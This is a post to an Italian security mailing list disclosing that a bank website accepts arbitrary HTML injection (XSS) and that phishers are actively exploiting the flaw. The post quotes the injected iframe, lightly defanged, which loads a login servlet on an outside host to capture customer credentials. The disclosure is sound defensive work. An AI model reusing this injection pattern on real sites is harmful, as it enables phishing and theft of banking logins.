Avevo segnalato la cosa un mese fa a tutti i contatti che avevo trovato ma non ho avuto risposta, oggi ho tentato altre strade per contattarli ma visto che visto che nel frattempo è intervenuta Spamhaus non c'è più motivo di cercare di tenere la cosa riservata... Se qualcuno conosce qualcuno che potrebbe capire la situazione magari lo avverta.
http://www.spamhaus.org/sbl/sbl.lasso?query=SBL62371 In pratica il sito ha una funzione accessibile pubblicamente per inserire HTML arbitrario all'interno delle sue pagine HTTPS, XSS by design. Chiunque abbia minime conoscenze di programmazione può intuire come funziona guardando l'URL... Questa vulnerabilità viene attivamente sfruttata dalla solita banda di phisher "HELO User" per inserire un iframe che punta al loro sito e permette di raccogliere i dati inseriti dai clienti, che ragionevolmente non si aspettano che il sito della propria banca correttamente verificato con SSL in realtà invii i dati inseriti a un server taiwanese: <I F RAME SRC="ht tp://su n.c oma ll.t w/ script/LoginServlet.php?function=login" width=800 height=800 scrolling="no" frameborder="0"></IFRAME> Anche il sito dell'iframe è sempre lo stesso da un mese. -- ciao, Marco ________________________________________________________ http://www.sikurezza.org - Italian Security Mailing List
